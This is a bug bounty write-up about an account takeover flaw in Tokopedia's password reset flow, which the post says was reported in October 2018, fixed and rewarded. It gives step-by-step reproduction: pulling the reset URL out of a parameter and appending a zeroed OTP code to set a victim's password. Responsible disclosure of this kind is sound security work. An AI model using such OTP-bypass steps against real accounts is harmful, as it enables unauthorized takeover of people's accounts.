Tokopedia Account Takeover Bug Worth 8 Million IDR

Hi Infosec community,

In October month i was just searching for bug bounty programs through google dorks & I landed on this link .

I went through terms and conditions. I started hunting for bugs & within an hour i found account takeover bug.

Steps To Reproduce:

Victim email of tokopedia account: ezgcmmfgc@champmails.com
1. Go to the https://accounts.tokopedia.com/reset-password
2. Now type the victim account email id & click on continue button. After that select verification method email.
3. Now copy the full URL from address bar. Which look like https://accounts.tokopedia.com/otp/c/page?otp_type=132& email=ezgcmmfgc%40champmails.com&ld=https://account s.tokopedia.com/resetpassword?e=ZXpnY21tZmdjQGNoYW1wbWFpbHMuY29t

4. Now in above URL. See there is password reset URL. Which start after “ld” parameter. 
https://accounts.tokopedia.com/resetpassword?e=ZXpnY21tZmdjQGNoYW1wbWFpbHMuY29t

6. Now in password reset URL we have to just add “&otpcode=000000” at the end of password reset URL.
For ex.
https://accounts.tokopedia.com/resetpassword?e=ZXpnY21tZmdjQGNoYW1wbWFpbHMuY29t &otpcode=000000
7. Now go to the above URL. And just enter the password of whatever you choice. Victim Tokopedia account is successfully takeover.

Video POC:

Timeline:

14-Oct-2018: Reported

15-Oct-2018: Received Response

“Hi,

Thank you for waiting. Your report has been verified, and it’s a valid security bug with Critical Severity. We are still fixing this bug, please be patient.”

17-Oct-2018: Fixed

17-Oct-2018: 8 Million IDR Rewarded

Bounty mail

6-Dec-2018: Received Bounty.

Twitter : https://twitter.com/ironfisto

Few more account takeover writeups coming . Thank for reading. Bye